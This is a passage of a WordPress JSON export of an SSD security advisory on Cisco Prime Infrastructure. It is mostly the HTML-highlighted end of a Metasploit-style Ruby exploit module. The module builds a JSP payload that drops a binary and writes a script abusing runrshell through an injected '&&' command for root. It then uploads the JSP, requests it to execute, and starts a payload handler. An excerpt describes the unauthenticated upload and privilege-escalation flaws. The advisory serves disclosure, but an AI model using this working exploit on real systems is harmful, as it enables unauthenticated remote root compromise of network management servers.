class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_ostream} =<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-143\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BufferedOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FileOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-c\">#{var_path}));<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-144\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{var_ostream}.write(#{var_raw});<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{var_ostream}.close();<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-146\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">File<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_tmp2} = File.createTempFile(&#8220;#{native_payload_name}&#8221;, &#8220;.sh&#8221;);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">String<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_path2} = #{var_tmp2}.getAbsolutePath();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-149\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-150\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">PrintWriter<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_pstream} =<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-151\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">PrintWriter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-i\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FileOutputStream<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-c\">#{var_path2}));<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-152\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{var_pstream}.println(&#8220;!#\/bin\/sh&#8221;);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-153\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{var_pstream}.println(&#8220;\/opt\/CSCOlumos\/bin\/runrshell &#8216;\\&#8221; &amp;&amp; &#8221; + #{var_path} + &#8221; #'&#8221;);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-154\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{var_pstream}.close();<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-155\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{chmod}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-156\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-157\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">Process<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">#{var_proc2} = Runtime.getRuntime().exec(#{var_path2});<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-158\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-c\">#{cleanup}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-159\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">catch<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">Exception<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">e<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-k\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-160\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-k\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-161\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-ta\">%&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-162\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-163\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-164\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">gsub<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-165\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">gsub<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-166\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">gsub<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">x0d<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">x0a<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-167\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jsp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">gsub<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\"><\/span><span class=\"crayon-v\">x0a<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-168\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-169\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">jsp<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-170\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-171\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-172\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-173\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">exploit<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-174\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp_payload<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">generate_jsp_payload<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-175\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-176\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">jsp_name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">upload_payload<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">jsp_payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-177\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-178\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># we land in \/opt\/CSCOlumos, so we don&#8217;t know the apache directory<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-179\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># as it changes between versions&#8230; so leave this commented for now<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-180\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># &#8230; and try to find a good way to clean it later<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-181\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># register_files_for_cleanup(jsp_name)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-182\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-183\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print_status<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;#{peer} &#8211; Executing payload&#8230;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-184\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">send_request_cgi<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-185\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;uri&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">normalize_uri<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">datastore<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;TARGETURI&#8217;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">jsp_name<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-186\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;method&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;GET&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-187\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-188\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-189\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">handler<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-190\"><span class=\"crayon-e\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-191\"><span class=\"crayon-st\">end<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0372 seconds] -->  <\/p>\n<p>&nbsp;<\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3723\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Thu, 04 Oct 2018 05:12:22 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary Cisco Prime Infrastructure (CPI) contains two vulnerabilities that when exploited allow an unauthenticated attacker to achieve root privileges and execute code remotely. The first vulnerability is a file upload vulnerability that allows the attacker to upload and execute JSP files as the Apache Tomcat user. The second vulnerability is a privilege escalation to &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3723\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Cisco Prime Infrastructure File Inclusion and Remote Command Execution to Privileges Escalation<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[14428,11946,11851,10757,12136],"class_list":["post-13520","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-local-file-inclusion","tag-privilege-escalation","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13520","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=13520"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/13520\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=13520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=13520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=13520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}